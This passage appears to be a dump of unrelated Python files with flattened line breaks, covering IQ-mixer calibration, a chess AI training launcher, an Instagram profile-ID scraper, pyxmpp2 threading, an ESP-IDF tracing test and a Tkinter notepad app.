vi_step self.vq_step = vq_step #Instantiate initial guesses self.phase_guess = [param_guess[0], param_guess[1]] self.q_guess = [param_guess[2], param_guess[3]] self.dc_i_guess = param_guess[4] self.dc_q_guess = param_guess[5] # Instantiate params we will optimize self.opt_phase = np.zeros(2) self.opt_q = np.zeros(2) self.amp_q_opt = None self.amp_i_opt = None self.dc_offset_i_opt = None self.dc_offset_q_opt = None # Instantiate arrays and bounds self.opt_lower_sideband_pow = float("inf") self.opt_carrier_pow = float("inf") # Instantiate and set markers self.upp_sb_marker = None self.lower_sb_marker = None self.carrier_marker = None # set initial guess parameters self.set_phase_and_amp(self.phase_guess[0], self.q_guess[0], 0) self.set_phase_and_amp(self.phase_guess[1], self.q_guess[1], 1) self.set_dc_offsets(self.dc_i_guess, self.dc_q_guess) # Enable signal self.hd.seti('awgs/{}/enable'.format(int(np.floor((HDAWG_ports[1] - 1) / 2))), 1) self.set_markers(1) self._AWG_DELAY_TIME = awg_delay_time self._averages = averages def set_markers(self, signal): # signal: 0 or 1, refers two first or second frequency # Center frequency at carrier frequency self.sa.set_center_frequency(self.carrier + self.signal_freq[signal]) self.sa.set_frequency_span(6 * self.signal_freq[signal]) # Marker for upper sideband. self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1) self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2) self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3) # define target frequencies markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker] target_freqs = np.array([self.carrier + self.signal_freq[signal], self.carrier - self.signal_freq[signal], self.carrier]) max_deviation = 1e6 for marker, target_freq in zip(markers, target_freqs): time.sleep(1) marker.set_freq(target_freq) #assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz" self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.") #Set reference level to just above the height of our signal to minimize our noise floor self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2) if self.plot_traces == True: self.sa.plot_trace() def opt_lower_sideband(self, signal): #set the markers for the sideband we are currently looking at if self.plot_traces == True: self.plot_traces = False self.set_markers(signal) self.plot_traces = True else: self.set_markers(signal) #gradient descent starting point phase = self.phase_guess[signal] q = self.q_guess[signal] self.set_phase_and_amp(phase, q, signal) curr_power = self._average_marker_power(self.lower_sb_marker) #store power values for every iteration power_vec = [curr_power] # initialize step sizes and iteration number num_iterations = 0 phase_step = self.phase_step q_step = self.q_step while num_iterations < self.max_iterations and curr_power > self.min_power: grad = self.calc_slope_phase_and_amp(phase, q, signal, phase_step, q_step) phase_new = phase - grad[0] * phase_step q_new = q - grad[1] * q_step self.set_phase_and_amp(phase_new, q_new, signal) new_power = self._average_marker_power(self.lower_sb_marker) if new_power < curr_power: curr_power = new_power phase = phase_new q = q_new else: phase_step = phase_step / 2 q_step = q_step / 2 power_vec.append(curr_power) num_iterations = num_iterations + 1 if num_iterations < self.max_iterations: self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations') else: self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations') time.sleep(1) self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.opt_phase[signal] = phase self.opt_q[signal] = q self.set_phase_and_amp(self.opt_phase[signal], self.opt_q[signal], signal) if self.plot_traces == True: plt.plot(power_vec, label='lower sideband for frequency {}'.format(signal)) def opt_carrier(self): #gradient descent starting point vi = self.dc_i_guess vq = self.dc_q_guess self.set_dc_offsets(vi, vq) curr_power = self._average_marker_power(self.carrier_marker) #store power values for every iteration power_vec = [curr_power] num_iterations = 0 while num_iterations < self.max_iterations and curr_power > self.min_power: grad = self.calc_slope_dc_offsets(vi, vq) vi_new = vi - grad[0] * self.vi_step vq_new = vq - grad[1] * self.vq_step self.set_dc_offsets(vi_new, vq_new) new_power = self._average_marker_power(self.carrier_marker) if new_power < curr_power: curr_power = new_power vi = vi_new vq = vq_new else: self.vi_step = self.vi_step / 1.2 self.vq_step = self.vq_step / 1.2 power_vec.append(curr_power) num_iterations = num_iterations + 1 if num_iterations < self.max_iterations: self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations') else: self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations') time.sleep(1) self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + 'dBm') self.dc_offset_i_opt = vi self.dc_offset_q_opt = vq self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt) if self.plot_traces == True: plt.plot(power_vec, label='carrier band') plt.xlabel('iteration #') plt.ylabel('power [dBm]') plt.legend() def opt(self): self.opt_lower_sideband(0) self.hd.log.info('Lower sideband power for 1st frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.opt_lower_sideband(1) self.hd.log.info('Lower sideband power for second frequency is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.opt_carrier() time.sleep(1) #self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])') self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm') self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm') def set_phase_and_amp(self, phase, q, signal): amp_i = 2. * q / (1 + q) amp_q = 2. * 1 / (1 + q) dphase_i = np.arccos(amp_i / 2) * 180 / np.pi dphase_q = np.arccos(amp_q / 2) * 180 / np.pi # Set i and q amplitudes self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format( int(np.floor((self.HDAWG_ports[0] - 1) / 2)), np.mod(self.HDAWG_ports[0] - 1, 2), 2 * signal), phase + dphase_i) self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format( int(np.floor((self.HDAWG_ports[0] - 1) / 2)), np.mod(self.HDAWG_ports[0] - 1, 2), 2 * signal + 1), phase - dphase_i) self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format( int(np.floor((self.HDAWG_ports[1] - 1) / 2)), np.mod(self.HDAWG_ports[1] - 1, 2), 2 * signal), dphase_q) self.hd.setd('awgs/{}/outputs/{}/modulation/carriers/{}/phaseshift'.format( int(np.floor((self.HDAWG_ports[1] - 1) / 2)), np.mod(self.HDAWG_ports[1] - 1, 2), 2 * signal + 1), -dphase_q) def set_dc_offsets(self, v1, v2): # Set I DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1) # Set Q DC-offset self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2) def _average_marker_power(self, marker): total_sum = 0 for i in range(self._averages): total_sum = total_sum + marker.get_power() return total_sum / self._averages def calc_slope_phase_and_amp(self, phase, q, signal, phase_step, q_step): self.set_phase_and_amp(phase + phase_step, q, signal) phase_p = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase - phase_step, q, signal) phase_m = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase, q + q_step, signal) q_p = self._average_marker_power(self.lower_sb_marker) self.set_phase_and_amp(phase, q - q_step, signal) q_m = self._average_marker_power(self.lower_sb_marker) return([(phase_p - phase_m) / 2, (q_p - q_m) / 2]) def calc_slope_dc_offsets(self, vi, vq): self.set_dc_offsets(vi + self.vi_step, vq) vi_p = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi - self.vi_step, vq) vi_m = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi, vq + self.vq_step) vq_p = self._average_marker_power(self.carrier_marker) self.set_dc_offsets(vi, vq - self.vq_step) vq_m = self._average_marker_power(self.carrier_marker) return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2])
python
import unittest from runner.robot.zipper import zip_robot class RobotChanges(unittest.TestCase): def test_set_new_robot_position(self): robot1 = { 'part': { 'connects_to': [ { 'part': { } } ] } } robot2 = { 'part': { 'connects_to': [ { 'part': { 'display_as': 'colored' } } ] } } zip_robot(robot1, robot2) self.assertEqual(robot1['part']['connects_to'][0]['part']['display_as'], 'colored')
python
items = [ ("Mosh", 100), ("Brad", 90), ("Ahmed", 10), ] ratings = [items[1] for items in items] # Map Alternative ratings = [items[1] for items in items if items[1] >= 20] # Filter Alternative print(ratings)
python
import sys import chessai def main(): # parse script args startup_config = sys.argv[1] if len(sys.argv) >= 2 else 'all' # launch the training according to the specified startup config if startup_config == 'pretrain_fx': launch_pretrain_fx() if startup_config == 'pretrain_ratings': launch_pretrain_ratings() # TODO: add launching single other trainings here ... elif startup_config == 'all': launch_pretrain() launch_pretrain_ratings() # TODO: add launching other trainings here ... else: raise ValueError('Invalid args! Unknown training startup configuration {}!'.format(startup_config)) def launch_pretrain(): # launch entire pre-training launch_pretrain_fx() def launch_pretrain_fx(): params = { 'batch_size': 32, 'learn_rate': 0.2, 'epochs': 30, 'lr_decay_epochs': 3, 'lr_decay_rate': 0.5, 'log_interval': 100, 'total_train_batches': 2400, # TODO: find out the exact value } # create a new training session and launch the training session = chessai.pretrain.DrawGenTrainingSession(params) session.run_training() # TODO: launch all other pre-train sessions here, too ... def launch_pretrain_ratings(): # frozen fx settings params = { 'batch_size': 32, 'learn_rate': 0.01, 'epochs': 30, 'lr_decay_epochs': 3, 'lr_decay_rate': 0.1, 'is_fx_trainable': False, 'log_interval': 100, 'total_train_batches': 2400, # TODO: find out the exact value } # create a new training session and launch the training session = chessai.pretrain.RatingTrainingSession(params) session.run_training() # def get_instance_by_name(fq_classname: str): # parts = kls.split('.') # module = ".".join(parts[:-1]) # m = __import__( module ) # for comp in parts[1:]: # m = getattr(m, comp) # return m if __name__ == '__main__': main()
python
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Sat Nov 26 20:48:30 2016 Convert Instagram handles to numeric IDs, which are needed as inputs for API queries. Sample output ERROR: "not-a-handle" is not available IG user data ------------ Platform: Instagram Followers: 394 Handle: thedrawingroomcafe ID: 1711102403 Full name: The Drawing Room """ import csv import json import requests from bs4 import BeautifulSoup import config_social_handles as config def GetInstagramUserData(handle): """ Load the HTML for a user's profile on www.instagram.com. Read fields like user's numeric id from the profile HTML. Args handle: <type 'str'> Name of Instagram user. If it contains '@' then this will be remove. Returns out_dict: <type 'dict'> Dictionary of user fields and values. """ handle = handle.replace("@", "") base = "http://instagram.com/%s/" url = base % handle # access webpage and convert to soup req = requests.get(url) soup = BeautifulSoup(req.text, "lxml") # search for scripts for script in soup.find_all(u"script", type=u"text/javascript"): text = script.text # break when desired script is reached if "ProfilePage" in text: break # extract user profile from script and convert to JSON json_start = text.find("{") json_end = text.find(";") json_string = text[json_start:json_end] json_data = json.loads(json_string) # get user data from JSON # - use [0] as there is only one item profile = json_data["entry_data"]["ProfilePage"][0]["user"] # extract user details out_dict = {} out_dict["Platform"] = "Instagram" out_dict["ID"] = profile["id"] out_dict["Full name"] = profile["full_name"] out_dict["Handle"] = handle # OR profile['username'] from API out_dict["Followers"] = profile["followed_by"]["count"] return out_dict def main(): user_data = [] IG_users = config.IG_users for h in IG_users: try: IG_user_data = GetInstagramUserData(h) except ValueError: IG_user_data = {"Handle": h, "ID": "NOT AVAILABLE"} print 'ERROR: "%s" is not available' % h print user_data.append(IG_user_data) print "IG user data" print "------------" for u in user_data: for k, v in u.iteritems(): print "%s: %s" % (k, v) print out_name = "out_data.csv" with open(out_name, "w") as csvfile: fieldnames = ["Platform", "ID", "Handle", "Full name", "Followers"] writer = csv.DictWriter(csvfile, fieldnames=fieldnames) writer.writeheader() for user in user_data: # convert UTF-8 if unicode, otherwise do not convert for key, value in user.iteritems(): if isinstance(value, unicode): encoded_value = value.encode("utf-8") user[key] = encoded_value writer.writerow(user) print "Done - %s" % out_name if __name__ == "__main__": main()
python
# Generated by Django 2.2.1 on 2020-09-20 01:31 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('chapters', '0013_auto_20200920_0042'), ] operations = [ migrations.RemoveField( model_name='orderablecontent', name='content_type', ), migrations.RemoveField( model_name='orderablecontent', name='object_id', ), ]
python
# # (C) Copyright 2011 Jacek Konieczny <[email protected]> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License Version # 2.1 as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # """I/O Handling classes This module has a purpose similar to :std:`asyncore` from the base library, but should be more usable, especially for PyXMPP. Also, these interfaces should allow building application not only in asynchronous event loop model, but also threaded model. """ __docformat__ = "restructuredtext en" import time import threading import logging import sys import queue import inspect from .interfaces import MainLoop, HandlerReady, PrepareAgain from .interfaces import IOHandler, QUIT, EventHandler, TimeoutHandler from .events import EventDispatcher from ..settings import XMPPSettings from .wait import wait_for_read, wait_for_write logger = logging.getLogger("pyxmpp2.mainloop.threads") class IOThread(object): """Base class for `ReadingThread` and `WrittingThread`. :Ivariables: - `name`: thread name (for debugging) - `io_handler`: the I/O handler object to poll - `thread`: the actual thread object - `exc_info`: this will hold exception information tuple for the last exception raised in the thread. - `exc_queue`: queue to put all exceptions raised in the thread. :Types: - `name`: `str` - `io_handler`: `IOHandler` - `thread`: :std:`threading.Thread` - `exc_info`: (type, value, traceback) tuple """ def __init__(self, settings, io_handler, name, daemon = True, exc_queue = None): # pylint: disable=R0913 self.settings = settings if settings else XMPPSettings() self.name = name self.io_handler = io_handler self.thread = threading.Thread(name = name, target = self._run) self.thread.daemon = daemon self.exc_info = None self.exc_queue = exc_queue self._quit = False def start(self): """Start the thread. """ self.thread.start() def is_alive(self): """Check if the thread is alive.""" return self.thread.is_alive() def stop(self): """Request the thread to stop.""" self._quit = True def join(self, timeout): """Join the thread (wait until it stops).""" return self.thread.join(timeout) def _run(self): """The thread function. Calls `self.run()` in loop and if it raises an exception, stores it in self.exc_queue. If `exc_queue` is None the exception will abort the thread. """ logger.debug("{0}: entering thread".format(self.name)) while True: try: self.run() except Exception: # pylint: disable-msg=W0703 self.exc_info = sys.exc_info() logger.debug("exception in the {0!r} thread:" .format(self.name), exc_info = self.exc_info) if self.exc_queue: self.exc_queue.put( (self, self.exc_info) ) continue else: logger.debug("{0}: aborting thread".format(self.name)) return except: logger.debug("{0}: aborting thread".format(self.name)) return break logger.debug("{0}: exiting thread".format(self.name)) def run(self): """The thread function.""" raise NotImplementedError class ReadingThread(IOThread): """A thread reading from io_handler. This thread will be also the one to call the `IOHandler.prepare` method until HandlerReady is returned. It can be used (together with `WrittingThread`) instead of a main loop.""" def __init__(self, settings, io_handler, name = None, daemon = True, exc_queue = None): # pylint: disable=R0913 if name is None: name = "{0!r} reader".format(io_handler) IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue) def run(self): """The thread function. First, call the handler's 'prepare' method until it returns `HandlerReady` then loop waiting for the socket input and calling 'handle_read' on the handler. """ # pylint: disable-msg=R0912 interval = self.settings["poll_interval"] prepared = False timeout = 0.1 while not self._quit: if not prepared: logger.debug("{0}: preparing handler: {1!r}".format( self.name, self.io_handler)) ret = self.io_handler.prepare() logger.debug("{0}: prepare result: {1!r}".format(self.name, ret)) if isinstance(ret, HandlerReady): prepared = True elif isinstance(ret, PrepareAgain): if ret.timeout is not None: timeout = ret.timeout else: raise TypeError("Unexpected result type from prepare()") if self.io_handler.is_readable(): logger.debug("{0}: readable".format(self.name)) fileno = self.io_handler.fileno() if fileno is not None: readable = wait_for_read(fileno, interval) if readable: self.io_handler.handle_read() elif not prepared: if timeout: time.sleep(timeout) else: logger.debug("{0}: waiting for readability".format(self.name)) if not self.io_handler.wait_for_readability(): break class WrittingThread(IOThread): """A thread reading from io_handler. It can be used (together with `WrittingThread`) instead of a main loop.""" def __init__(self, settings, io_handler, name = None, daemon = True, exc_queue = None): # pylint: disable=R0913 if name is None: name = "{0!r} writer".format(io_handler) IOThread.__init__(self, settings, io_handler, name, daemon, exc_queue) def run(self): """The thread function. Loop waiting for the handler and socket being writable and calling `interfaces.IOHandler.handle_write`. """ while not self._quit: interval = self.settings["poll_interval"] if self.io_handler.is_writable(): logger.debug("{0}: writable".format(self.name)) fileno = self.io_handler if fileno: writable = wait_for_write(fileno, interval) if writable: self.io_handler.handle_write() else: logger.debug("{0}: waiting for writaility".format(self.name)) if not self.io_handler.wait_for_writability(): break class EventDispatcherThread(object): """Event dispatcher thread. :Ivariables: - `name`: thread name (for debugging) - `event_queue`: the event queue to poll - `thread`: the actual thread object - `exc_info`: this will hold exception information tuple whenever the thread was aborted by an exception. :Types: - `name`: `str` - `event_queue`: :std:`Queue.Queue` - `thread`: :std:`threading.Thread` - `exc_info`: (type, value, traceback) tuple """ def __init__(self, event_dispatcher, name = None, daemon = True, exc_queue = None): if name is None: name = "event dispatcher" self.name = name self.thread = threading.Thread(name = name, target = self.run) self.thread.daemon = daemon self.exc_info = None self.exc_queue = exc_queue self.event_dispatcher = event_dispatcher def start(self): """Start the thread.""" self.thread.start() def is_alive(self): """Check if the thread is alive.""" return self.thread.is_alive() def join(self, timeout): """Join the thread.""" return self.thread.join(timeout) def run(self): """The thread function. Calls `self.run()` and if it raises an exception, stores it in self.exc_info and exc_queue """ logger.debug("{0}: entering thread".format(self.name)) while True: try: self.event_dispatcher.loop() except Exception: # pylint: disable-msg=W0703 self.exc_info = sys.exc_info() logger.debug("exception in the {0!r} thread:" .format(self.name), exc_info = self.exc_info) if self.exc_queue: self.exc_queue.put( (self, self.exc_info) ) continue else: logger.debug("{0}: aborting thread".format(self.name)) return except: logger.debug("{0}: aborting thread".format(self.name)) return break logger.debug("{0}: exiting thread".format(self.name)) class TimeoutThread(object): """Thread to handle `TimeoutHandler` methods. :Ivariables: - `method`: the timout handler method - `name`: thread name (for debugging) - `thread`: the actual thread object - `exc_info`: this will hold exception information tuple whenever the thread was aborted by an exception. - `exc_queue`: queue for raised exceptions :Types: - `name`: `str` - `method`: a bound method decorated with `interfaces.timeout_handler` - `thread`: :std:`threading.Thread` - `exc_info`: (type, value, traceback) tuple - `exc_queue`: queue for raised exceptions """ def __init__(self, method, name = None, daemon = True, exc_queue = None): if name is None: name = "{0!r} timer thread" self.name = name self.method = method self.thread = threading.Thread(name = name, target = self._run) self.thread.daemon = daemon self.exc_info = None self.exc_queue = exc_queue self._quit = False def start(self): """Start the thread. """ self.thread.start() def is_alive(self): """Check if the thread is alive.""" return self.thread.is_alive() def stop(self): """Request the thread to stop.""" self._quit = True def join(self, timeout): """Join the thread (wait until it stops).""" return self.thread.join(timeout) def _run(self): """The thread function. Calls `self.run()` and if it raises an exception, stores it in self.exc_info """ logger.debug("{0}: entering thread".format(self.name)) while True: try: self.run() except Exception: # pylint: disable-msg=W0703 self.exc_info = sys.exc_info() logger.debug("exception in the {0!r} thread:" .format(self.name), exc_info = self.exc_info) if self.exc_queue: self.exc_queue.put( (self, self.exc_info) ) continue else: logger.debug("{0}: aborting thread".format(self.name)) return except: logger.debug("{0}: aborting thread".format(self.name)) return break logger.debug("{0}: exiting thread".format(self.name)) def run(self): """The thread function.""" # pylint: disable-msg=W0212 timeout = self.method._pyxmpp_timeout recurring = self.method._pyxmpp_recurring while not self._quit and timeout is not None: if timeout: time.sleep(timeout) if self._quit: break ret = self.method() if recurring is None: timeout = ret elif not recurring: break class ThreadPool(MainLoop): """Thread pool object, as a replacement for an asychronous event loop.""" # pylint: disable-msg=R0902 def __init__(self, settings = None, handlers = None): self.settings = settings if settings else XMPPSettings() self.io_handlers = [] self.timeout_handlers = [] self.event_queue = self.settings["event_queue"] self.event_dispatcher = EventDispatcher(self.settings, handlers) self.exc_queue = queue.Queue() self.io_threads = [] self.timeout_threads = [] self.event_thread = None self.daemon = False if handlers: for handler in handlers: self.add_handler(handler) def add_handler(self, handler): if isinstance(handler, IOHandler): self._add_io_handler(handler) if isinstance(handler, EventHandler): self.event_dispatcher.add_handler(handler) if isinstance(handler, TimeoutHandler): self._add_timeout_handler(handler) def remove_handler(self, handler): if isinstance(handler, IOHandler): self._remove_io_handler(handler) if isinstance(handler, EventHandler): self.event_dispatcher.remove_handler(handler) if isinstance(handler, TimeoutHandler): self._remove_timeout_handler(handler) def _add_io_handler(self, handler): """Add an IOHandler to the pool. """ self.io_handlers.append(handler) if self.event_thread is None: return def _run_io_threads(self, handler): """Start threads for an IOHandler. """ reader = ReadingThread(self.settings, handler, daemon = self.daemon, exc_queue = self.exc_queue) writter = WrittingThread(self.settings, handler, daemon = self.daemon, exc_queue = self.exc_queue) self.io_threads += [reader, writter] reader.start() writter.start() def _remove_io_handler(self, handler): """Remove an IOHandler from the pool. """ if handler not in self.io_handlers: return self.io_handlers.remove(handler) for thread in self.io_threads: if thread.io_handler is handler: thread.stop() def _add_timeout_handler(self, handler): """Add a TimeoutHandler to the pool. """ self.timeout_handlers.append(handler) if self.event_thread is None: return self._run_timeout_threads(handler) def _run_timeout_threads(self, handler): """Start threads for a TimeoutHandler. """ # pylint: disable-msg=W0212 for dummy, method in inspect.getmembers(handler, callable): if not hasattr(method, "_pyxmpp_timeout"): continue thread = TimeoutThread(method, daemon = self.daemon, exc_queue = self.exc_queue) self.timeout_threads.append(thread) thread.start() def _remove_timeout_handler(self, handler): """Remove a TimeoutHandler from the pool. """ if handler not in self.timeout_handlers: return self.io_handlers.remove(handler) for thread in self.timeout_threads: if thread.handler_method.__self__ is handler: thread.stop() def start(self, daemon = False): """Start the threads.""" self.daemon = daemon self.io_threads = [] self.event_thread = EventDispatcherThread(self.event_dispatcher, daemon = daemon, exc_queue = self.exc_queue) self.event_thread.start() for handler in self.io_handlers: self._run_io_threads(handler) for handler in self.timeout_handlers: self._run_timeout_threads(handler) def stop(self, join = False, timeout = None): """Stop the threads. :Parameters: - `join`: join the threads (wait until they exit) - `timeout`: maximum time (in seconds) to wait when `join` is `True`). No limit when `timeout` is `None`. """ logger.debug("Closing the io handlers...") for handler in self.io_handlers: handler.close() if self.event_thread.is_alive(): logger.debug("Sending the QUIT signal") self.event_queue.put(QUIT) logger.debug(" sent") threads = self.io_threads + self.timeout_threads for thread in threads: logger.debug("Stopping thread: {0!r}".format(thread)) thread.stop() if not join: return if self.event_thread: threads.append(self.event_thread) if timeout is None: for thread in threads: thread.join() else: timeout1 = (timeout * 0.01) / len(threads) threads_left = [] for thread in threads: logger.debug("Quick-joining thread {0!r}...".format(thread)) thread.join(timeout1) if thread.is_alive(): logger.debug(" thread still alive".format(thread)) threads_left.append(thread) if threads_left: timeout2 = (timeout * 0.99) / len(threads_left) for thread in threads_left: logger.debug("Joining thread {0!r}...".format(thread)) thread.join(timeout2) self.io_threads = [] self.event_thread = None @property def finished(self): return self.event_thread is None or not self.event_thread.is_alive() @property def started(self): return self.event_thread is not None def quit(self): self.event_queue.put(QUIT) def loop(self, timeout = None): if not self.event_thread: return interval = self.settings["poll_interval"] if timeout is None: while self.event_thread.is_alive(): self.loop_iteration(interval) else: timeout = time.time() + timeout while self.event_thread.is_alive() and time.time() < timeout: self.loop_iteration(interval) def loop_iteration(self, timeout = 0.1): """Wait up to `timeout` seconds, raise any exception from the threads. """ try: exc_info = self.exc_queue.get(True, timeout)[1] except queue.Empty: return exc_type, exc_value, ext_stack = exc_info raise exc_type(exc_value).with_traceback(ext_stack)
python
# encoding: utf-8 """ @version: v1.0 @author: Richard @license: Apache Licence @contact: [email protected] @site: @software: PyCharm @time: 2019/11/30 20:03 """
python
from __future__ import unicode_literals import os import re import tempfile from io import open import debug_backend import ttfw_idf @ttfw_idf.idf_example_test(env_tag='test_jtag_arm') def test_examples_sysview_tracing_heap_log(env, extra_data): rel_project_path = os.path.join('examples', 'system', 'sysview_tracing_heap_log') dut = env.get_dut('sysview_tracing_heap_log', rel_project_path) proj_path = os.path.join(dut.app.idf_path, rel_project_path) elf_path = os.path.join(dut.app.binary_path, 'sysview_tracing_heap_log.elf') def get_temp_file(): with tempfile.NamedTemporaryFile(delete=False) as f: return f.name try: tempfiles = [get_temp_file(), get_temp_file()] with open(os.path.join(proj_path, 'gdbinit')) as f_in, open(tempfiles[0], 'w') as f_out: new_content = f_in.read() # localhost connection issue occurs in docker unless: new_content = new_content.replace(':3333', '127.0.0.1:3333', 1) new_content = new_content.replace('file:///tmp/heap_log.svdat', 'file://{}'.format(tempfiles[1]), 1) f_out.write(new_content) with ttfw_idf.OCDBackend(os.path.join(proj_path, 'openocd.log'), dut.app.target): dut.start_app() dut.expect('esp_apptrace: Initialized TRAX on CPU0') gdb_log = os.path.join(proj_path, 'gdb.log') gdb_workdir = os.path.join(proj_path, 'main') with ttfw_idf.GDBBackend(gdb_log, elf_path, dut.app.target, tempfiles[0], gdb_workdir) as p: for _ in range(2): # There are two breakpoints p.gdb.wait_target_state(debug_backend.TARGET_STATE_RUNNING) stop_reason = p.gdb.wait_target_state(debug_backend.TARGET_STATE_STOPPED) assert stop_reason == debug_backend.TARGET_STOP_REASON_BP, 'STOP reason: {}'.format(stop_reason) # dut has been restarted by gdb since the last dut.expect() dut.expect('esp_apptrace: Initialized TRAX on CPU0') with ttfw_idf.CustomProcess(' '.join([os.path.join(dut.app.idf_path, 'tools/esp_app_trace/sysviewtrace_proc.py'), '-p', '-b', elf_path, tempfiles[1]]), logfile='sysviewtrace_proc.log') as sysviewtrace: sysviewtrace.pexpect_proc.expect(re.compile(r'Found \d+ leaked bytes in \d+ blocks.'), timeout=120) finally: for x in tempfiles: try: os.unlink(x) except Exception: pass if __name__ == '__main__': test_examples_sysview_tracing_heap_log()
python
from tkinter import * from tkinter.messagebox import showinfo,askyesnocancel from tkinter.filedialog import askopenfilename,asksaveasfilename import os from tkinter import simpledialog def new(event=None): #.................Creates new file and saves current flle...........# global file var=askyesnocancel("New..","Do you want to save your document") if(var!=None): if(var==True): saveas() if(file!=None): root.title("Untitled - J_PAD") file=None text.delete(1.0,END) def openfile(event=None): #.................opens desired file in J_PAD...........# global file file=askopenfilename(defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")]) if file == "": #.................Checks file exists or not...........# file=None else: root.title(os.path.basename(file)+"-J_PAD") text.delete(1.0,END) f=open(file,"r") text.insert(1.0,f.read()) f.close() def saveas(event=None): #.................Saves known file with same name and untitled files with a new name in desired location...........# global file if file==None: #.................Checks file is untitled or known...........# file = asksaveasfilename(initialfile='Untitled.txt',defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")]) if file =="": #.................Checks file exists or not...........# file=None else: f=open(file,"w") f.write(text.get(1.0,END)) f.close() root.title(os.path.basename(file)+"-J_PAD") else: f=open(file,"w") #.................Write to the existing file...........# f.write(text.get(1.0,END)) f.close() def exitroot(event=None): #.................Exits the main loop...........# var=askyesnocancel(title=f"QUIT-{file}",message="Do you want to save the file before exit..") if(var!=None): if(var==True): saveas() root.destroy() def copy(event=None): #.................Handles copy operation in file...........# text.event_generate(("<<Copy>>")) def paste(event=None): #.................Handles paste operation in file...........# text.event_generate(("<<Paste>>")) def selectall(event=None): #................Selects all the text in the file...........# text.tag_add(SEL,"1.0",END) text.mark_set(INSERT,"1.0") text.see(INSERT) return 'break' def cut(event=None): #.................Handles cut operation in file...........# text.event_generate(("<<Cut>>")) def find(event=None): #.................finds the occurence of given word...........# findstr=simpledialog.askstring("Find...","Enter the text you want to search") textstr=text.get(1.0,END) occurence=textstr.count(findstr) showinfo("Find...",f"{findstr} have {occurence} occurences in the text ") def about(event=None): #.................about J_PAD...........# showinfo("J-PAD","Text editor by Himanshu") def help(event=None): #.................Shows important information for help...........# showinfo("Help...","For any help mail your queries on gmail [email protected]\nContact on given numbers :- 9548609762 9761594415") file=None #.............................Main window layout......................# root=Tk() #...................creates new window...............# root.wm_iconbitmap("1.ico") root.title("Untitled-J_PAD") #..................title of the root............# root.geometry("1000x800") #...................defines initial geometry to the root.........# scrollbarx=Scrollbar(root) #....................add scroll bar................# scrollbarx.pack(side=RIGHT,fill=Y) text = Text(root,font="comicsansms 11 bold") #....................text area for editor..........# text.pack(expand=True,fill=BOTH) scrollbarx.config(command=text.yview) #....................fix scroll bar with y view of text area...........# menubar=Menu(root) #..............................Menu bar......................# #.....................file menu......................# filemenu=Menu(menubar,tearoff=0) filemenu.add_command(label="New",command=new,accelerator="Ctrl+N") root.bind_all("<Control-N>",new) #..........binds function with key press.........# root.bind_all("<Control-n>",new) filemenu.add_command(label="Open",command=openfile,accelerator="Ctrl+O") root.bind_all("<Control-o>",openfile) #..........binds function with key press.........# root.bind_all("<Control-O>",openfile) filemenu.add_command(label="Save As",command=saveas,accelerator="Ctrl+S") root.bind_all("<Control-s>",saveas) #..........binds function with key press.........# root.bind_all("<Control-S>",saveas) filemenu.add_separator() filemenu.add_command(label="Exit",command=exitroot,accelerator="Ctrl+Q") root.bind_all("<Control-q>",exitroot) #..........binds function with key press.........# root.bind_all("<Control-Q>",exitroot) menubar.add_cascade(label="File",menu=filemenu) #.....................edit menu......................# editmenu=Menu(menubar,tearoff=0) editmenu.add_command(label="Copy",command=copy,accelerator="Ctrl+C") root.bind_all("<Control-C>",copy) #..........binds function with key press.........# root.bind_all("<Control-c>",copy) editmenu.add_command(label="Paste",command=paste,accelerator="Ctrl+V") root.bind_all("<Control-v>",paste) #..........binds function with key press.........# root.bind_all("<Control-V>",paste) editmenu.add_command(label="Cut",command=cut,accelerator="Ctrl+X") root.bind_all("<Control-X>",cut) #..........binds function with key 